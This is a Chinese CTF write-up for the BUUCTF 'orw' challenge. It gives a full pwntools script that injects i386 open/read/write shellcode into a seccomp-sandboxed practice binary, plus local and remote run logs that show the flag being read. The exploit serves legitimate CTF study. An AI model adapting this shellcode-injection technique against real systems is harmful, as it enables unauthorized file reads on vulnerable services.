1.题目信息
BUUCTF在线评测 下载orw时防病毒要关闭 2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护，并不能getshell。只能通过orw的方式拿到flag。
fd = open('./flag');  # 打开flag文件，得到fd…
1.题目信息
BUUCTF在线评测。下载 orw 时防病毒软件可能会拦截（它是一个故意带漏洞的练习程序）；与其关闭整机的防病毒，更稳妥的做法是只为该文件添加例外，或者在隔离的虚拟机中下载和运行。
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护并不能getshell。只能通过orw的方式拿到flag。
fd = open('./flag');      # 打开flag文件，得到fd
read(fd, buf, 0x30);      # 通过fd将flag的内容读到内存中
write(1, buf, 0x30);      # 将内存中的flag内容输出到屏幕（1 是 stdout）
在相关目录里面写入以下内容（本地测试用的假 flag）：
holyeye@ubuntu:~/Re/6$ echo flag{testtest} > ./flag
holyeye@ubuntu:~/Re/6$
3.解题脚本
root@pwn_test1604:/ctf/work/6# ls
orw  orw.i64  orw.py
root@pwn_test1604:/ctf/work/6# python
Python 2.7.12 (default, Nov 12 2018, 14:36:49)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> './flag'.encode('hex')
'2e2f666c6167'
>>> './flag\x00\x00'.encode('hex')
'2e2f666c61670000'
（注意 x86 是小端序且栈向低地址增长：先 push 0x00006761（"ag\0\0"），再 push 0x6c662f2e（"./fl"），esp 处才是连续的 "./flag\0\0"。`.encode('hex')` 只在 Python 2 可用，Python 3 需改为 `b'./flag'.hex()`。）
3.1只用修改的内容
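context.arch = 'i386'   # asm() must emit 32-bit code: the target is i386 (see checksec output)
DEBUG = 1               # attach gdb on a local run
LOCAL = True            # overwritten in __main__ depending on argv
BIN = './orw'
HOST = 'node5.buuoj.cn'
PORT = 25178


def exploit(p):
    """Send an open/read/write shellcode down tube ``p`` and drop to interactive.

    The binary executes whatever we send, but (per the writeup) sandboxes
    itself with prctl/seccomp so a shell is not an option. The payload
    therefore does the classic orw: open("./flag"), read it onto the stack,
    write it to stdout, all via raw ``int 0x80`` syscalls.

    ``p`` is a pwntools tube (process or remote); nothing is returned, the
    flag shows up on stdout.
    """
    # The binary prints "Give my your shellcode:" before its read().
    p.recvuntil('shellcode:')
    # Trailing '#' comments only: the source goes through cpp, so a '#' at
    # line start would be taken for a preprocessor directive.
    pl = '''
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        push 0x00006761     # "ag\\0\\0"  (little-endian, pushed first -> higher address)
        push 0x6c662f2e     # "./fl"    -> esp now points at "./flag\\0\\0"
        mov eax, 5          # open(esp, O_RDONLY, 0)
        mov ebx, esp
        mov ecx, 0
        mov edx, 0
        int 0x80
        mov ebx, eax        # fd (negative -errno if open failed; read then fails too)
        mov eax, 3          # read(fd, esp, 0x30)
        mov ecx, esp
        mov edx, 0x30
        int 0x80
        mov edx, eax        # write only what was read, not 0x30 bytes of stack
        mov eax, 4          # write(1, esp, n)
        mov ebx, 1
        mov ecx, esp
        int 0x80
        mov eax, 1          # exit(0): do not run off the end of the buffer
        xor ebx, ebx
        int 0x80
    '''
    # send(), not sendline(): the '\n' sendline appends lands right after the
    # last int 0x80 and gets executed (the SIGSEGV at shellcode+72 in the gdb
    # log). With an explicit exit the newline would be harmless anyway, but
    # the binary reads with read(), so no terminator is needed.
    # If the seccomp filter does not allow exit, the kernel kills the process;
    # the flag has already been written by then.
    p.send(asm(pl))
    p.interactive()
    return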
3.2全部脚本
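#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pickle import TRUE   # unused in this script; presumably an editor auto-import, safe to drop
from pwn import *
import sys

# gdb opens in a horizontal tmux split next to the exploit (see `tmux` before `python orw.py`).
context.terminal = ['tmux', 'sp', '-h']
context.log_level = 'debug'   # hex-dumps every send/recv; lower to 'info' once the exploit works
context.arch = 'i386'         # asm() must emit 32-bit code: the target is i386 (checksec output)
DEBUG = 1                     # attach gdb on a local run
LOCAL = True                  # overwritten in __main__ depending on argv
BIN = './orw'
HOST = 'node5.buuoj.cn'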
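PORT = 25178


def get_base_address(proc):
    """Return the load address of ``proc``: start of its first /proc/<pid>/maps entry.

    ``proc`` only needs a ``pid`` attribute (a pwntools process works).
    For a No-PIE binary like this one the first mapping is the image base
    (0x8048000 in the gdb log), so breakpoint offsets can be added to it.
    """
    # Text mode so split('-') works on both Python 2 and 3; 'with' closes the handle.
    with open('/proc/{}/maps'.format(proc.pid), 'r') as maps:
        first_mapping = maps.readline()
    return int(first_mapping.split('-')[0], 16)


def debug(bps, _s=''):
    """Attach gdb to the global tube ``p`` with a breakpoint at base+offset for each of ``bps``.

    ``_s`` is extra gdb script appended verbatim. Relies on the pwntools
    globals ``p`` and ``gdb`` set up in ``__main__``; SIGALRM is ignored so
    a timeout alarm in the target does not interrupt the debugging session.
    """
    script = 'handle SIGALRM ignore\n'
    base = get_base_address(p)
    script += 'set $_base = 0x{:x}\n'.format(base)
    for bp in bps:
        script += 'b *0x%x\n' % (base + bp)
    script += _s
    gdb.attach(p, gdbscript=script)

# pwn,caidan,leak,libc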
# recv recvuntil send sendline sendlineafter sendafter
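#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
def exploit(p):
    """Send an open/read/write shellcode down tube ``p`` and drop to interactive.

    The binary executes whatever we send, but (per the writeup) sandboxes
    itself with prctl/seccomp so a shell is not an option. The payload
    therefore does the classic orw: open("./flag"), read it onto the stack,
    write it to stdout, all via raw ``int 0x80`` syscalls.

    ``p`` is a pwntools tube (process or remote); nothing is returned, the
    flag shows up on stdout.
    """
    # The binary prints "Give my your shellcode:" before its read().
    p.recvuntil('shellcode:')
    # Trailing '#' comments only: the source goes through cpp, so a '#' at
    # line start would be taken for a preprocessor directive.
    pl = '''
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        push 0x00006761     # "ag\\0\\0"  (little-endian, pushed first -> higher address)
        push 0x6c662f2e     # "./fl"    -> esp now points at "./flag\\0\\0"
        mov eax, 5          # open(esp, O_RDONLY, 0)
        mov ebx, esp
        mov ecx, 0
        mov edx, 0
        int 0x80
        mov ebx, eax        # fd (negative -errno if open failed; read then fails too)
        mov eax, 3          # read(fd, esp, 0x30)
        mov ecx, esp
        mov edx, 0x30
        int 0x80
        mov edx, eax        # write only what was read, not 0x30 bytes of stack
        mov eax, 4          # write(1, esp, n)
        mov ebx, 1
        mov ecx, esp
        int 0x80
        mov eax, 1          # exit(0): do not run off the end of the buffer
        xor ebx, ebx
        int 0x80
    '''
    # send(), not sendline(): the '\n' sendline appends lands right after the
    # last int 0x80 and gets executed (the SIGSEGV at shellcode+72 in the gdb
    # log). With an explicit exit the newline would be harmless anyway, but
    # the binary reads with read(), so no terminator is needed.
    # If the seccomp filter does not allow exit, the kernel kills the process;
    # the flag has already been written by then.
    p.send(asm(pl))
    p.interactive()
    return


if __name__ == '__main__':
    elf = ELF(BIN)                  # loaded for checksec/symbol info; not used by the payload
    if len(sys.argv) > 1:           # any extra argument -> attack the remote instance
        LOCAL = False
        p = remote(HOST, PORT)
        exploit(p)
    else:
        LOCAL = True
        p = process(BIN)
        log.info('PID: ' + str(proc.pidof(p)[0]))
        # pause()
        if DEBUG:
            debug([])               # no breakpoints; just attach gdb and continue
        exploit(p)

# 3.3 运行本地  (writeup section heading: "run locally")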
rootpwn_test1604:/ctf/work/6# tmux
rootpwn_test1604:/ctf/work/6# python orw.py
rootpwn_test1604:/ctf/work/6# python orw.py [25/25]│ f 1 f765ab23 __read_nocancel25 [0/48]
[DEBUG] PLT 0x8048370 read │ f 2 8048582 main58
[DEBUG] PLT 0x8048370 read │ f 3 f759d637 __libc_start_main247
[DEBUG] PLT 0x8048380 printf │pwndbg c
[DEBUG] PLT 0x8048390 __stack_chk_fail │Continuing.
[DEBUG] PLT 0x80483a0 __libc_start_main │
[DEBUG] PLT 0x80483b0 prctl │Program received signal SIGSEGV, Segmentation fault.
[DEBUG] PLT 0x80483c0 __gmon_start__ │0x0804a0a8 in shellcode ()
[*] /ctf/work/6/orw │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch: i386-32-little │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO: Partial RELRO │ EAX 0x30Stack: Canary found │ EBX 0x1NX: NX disabled │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)PIE: No PIE (0x8048000) │ EDX 0x30RWX: Has RWX segments │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[] Starting local process ./orw: pid 179 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[*] PID: 179 │ EBP 0xffbd74c8 ◂— 0x0
[DEBUG] Wrote gdb script to /tmp/pwn1jT2Ys.gdb │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)file ./orw │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n */handle SIGALRM ignore │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base 0x8048000 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]
[*] running in new terminal: /usr/bin/gdb -q ./orw 179 -x /tmp/pwn1jT2Ys.gdb │ 0x804a0aa shellcode74 add byte ptr [eax], al
[DEBUG] Launching a new terminal: [/usr/bin/tmux, sp, -h, /usr/bin/gdb -q ./orw 1│ 0x804a0ac shellcode76 add byte ptr [eax], al
79 -x /tmp/pwn1jT2Ys.gdb] │ 0x804a0ae shellcode78 add byte ptr [eax], al
[] Waiting for debugger: Done
[DEBUG] Received 0x17 bytes: [0/25]│ f 1 f765ab23 __read_nocancel25 [0/48]Give my your shellcode: │ f 2 8048582 main58
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│ f 3 f759d637 __libc_start_main247
ludes /dev/stdin │pwndbg c
[DEBUG] Assembling │Continuing..section .shellcode,awx │.global _start │Program received signal SIGSEGV, Segmentation fault..global __start │0x0804a0a8 in shellcode ()_start: │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA__start: │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix │ EAX 0x30xor eax, eax │ EBX 0x1xor ebx, ebx │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)xor ecx, ecx │ EDX 0x30xor edx, edx │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x00006761 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x6c662f2e │ EBP 0xffbd74c8 ◂— 0x0mov eax, 5 #open(./flag) │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)mov ebx, esp │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n */mov ecx, 0 │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]int 0x80 │ 0x804a0aa shellcode74 add byte ptr [eax], almov ebx, eax │ 0x804a0ac shellcode76 add byte ptr [eax], almov eax, 3 #read(fd,esp,0x30) │ 0x804a0ae shellcode78 add byte ptr [eax], almov ecx, esp │ 0x804a0b0 shellcode80 add byte ptr [eax], almov edx, 0x30 │ 0x804a0b2 shellcode82 add byte ptr [eax], alint 0x80 │ 0x804a0b4 shellcode84 add byte ptr [eax], almov eax, 4 #write(1,esp,0x30) │ 0x804a0b6 shellcode86 add byte ptr [eax], almov ebx, 1 │ 0x804a0b8 shellcode88 add byte ptr [eax], almov ecx, esp │ 0x804a0ba shellcode90 add byte ptr [eax], almov edx, 0x30 │ 0x804a0bc shellcode92 add byte ptr [eax], alint 0x80 │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp 0xffbd74b4 ◂— 0x67616c66 (flag)
tep1 │01:0004│ 0xffbd74b8 ◂— 0x7365747b ({tes)
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│ 0xffbd74bc ◂— 0x73657474 (ttes)
/tmp/pwn-asm-bw_t9d/step4 │03:000c│ 0xffbd74c0 ◂— 0xf70a7d74
[DEBUG] Sent 0x49 bytes: │04:0010│ 0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│ │05:0014│ ebp 0xffbd74c8 ◂— 0x000000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│ │06:0018│ 0xffbd74cc —▸ 0xf759d637 (__libc_start_main247) ◂— add esp, 0x1000000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│ │07:001c│ 0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 000000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│ │x1b1db0 */00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│ │──────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── 00000049 │ ► f 0 804a0a8 shellcode72
[*] Switching to interactive mode │ f 1 67616c66
[DEBUG] Received 0x30 bytes: │ f 2 7365747b00000000 66 6c 61 67 7b 74 65 73 74 74 65 73 74 7d 0a f7 │flag│{tes│ttes│t}··│ │ f 3 7365747400000010 e0 74 bd ff 00 00 00 00 37 d6 59 f7 00 70 73 f7 │·t··│····│7·Y·│·ps·│ │ f 4 f70a7d7400000020 00 70 73 f7 00 00 00 00 37 d6 59 f7 01 00 00 00 │·ps·│····│7·Y·│····│ │ f 5 ffbd74e000000030 │ f 6 f759d637 __libc_start_main247
flag{testtest} │Program received signal SIGSEGV (fault address 0x30)
\xff\x00\x00\x00\x007psps\x007\x00$ 3.4 运行远程
rootpwn_test1604:/ctf/work/6# python orw.py 1
rootpwn_test1604:/ctf/work/6# tmux
[exited]
rootpwn_test1604:/ctf/work/6# python orw.py 1
[DEBUG] PLT 0x8048370 read
[DEBUG] PLT 0x8048380 printf
[DEBUG] PLT 0x8048390 __stack_chk_fail
[DEBUG] PLT 0x80483a0 __libc_start_main
[DEBUG] PLT 0x80483b0 prctl
[DEBUG] PLT 0x80483c0 __gmon_start__
[*] '/ctf/work/6/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
（NX 关闭且存在 RWX 段，所以写进 `shellcode` 缓冲区的字节可以直接被执行；No PIE 则意味着地址固定，gdb 里的 `$_base` 就是 0x8048000。）
[] Opening connection to node5.buuoj.cn on port 25178: Done
[DEBUG] Received 0x17 bytes:Give my your shellcode:
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,awx.global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4
[DEBUG] Sent 0x49 bytes:00000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│00000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│00000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│00000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│00000049
[*] Switching to interactive mode
[DEBUG] Received 0x30 bytes:00000000 66 6c 61 67 7b 31 30 33 37 66 34 39 62 2d 33 30 │flag│{103│7f49│b-30│00000010 36 63 2d 34 30 34 32 2d 38 34 31 31 2d 34 38 34 │6c-4│042-│8411│-484│00000020 39 32 64 61 35 37 30 36 62 7d 0a f7 01 00 00 00 │92da│5706│b}··│····│00000030
flag{1037f49b-306c-4042-8411-48492da5706b}
\x0[DEBUG] Received 0x2b bytes:timeout: the monitored command dumped core\n
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$ 3.5 避坑提醒
用 kali2023 的虚机环境不行，要用 ubuntu16.04 的虚机环境就可以。文中未分析原因；一个可能的因素是脚本按 Python 2 编写（见上面 Python 2.7.12 的交互记录和 `.encode('hex')`），而新发行版默认 Python 3，需自行确认。
另外，本地和远程运行末尾出现的 SIGSEGV / "timeout: the monitored command dumped core" 是预期现象而不是失败：shellcode 最后一个 `int 0x80` 之后没有 exit，`sendline()` 追加的 `\n`（0x0a）紧跟其后被当作指令执行（gdb 中 EIP 停在 shellcode+72，正好是发送的 0x48 字节 shellcode 之后），此时 flag 已经写到 stdout。用 `send()` 代替 `sendline()` 并在末尾加一个 `exit` 系统调用即可干净退出（若 seccomp 过滤器不放行 exit，进程会被内核杀掉，flag 同样已经输出）。write 的长度也应取 read 的返回值而不是固定 0x30，否则会把 flag 之后的栈内容一起打印出来（输出里 flag 后面那串 `\xff\x00...` 就是这样来的）。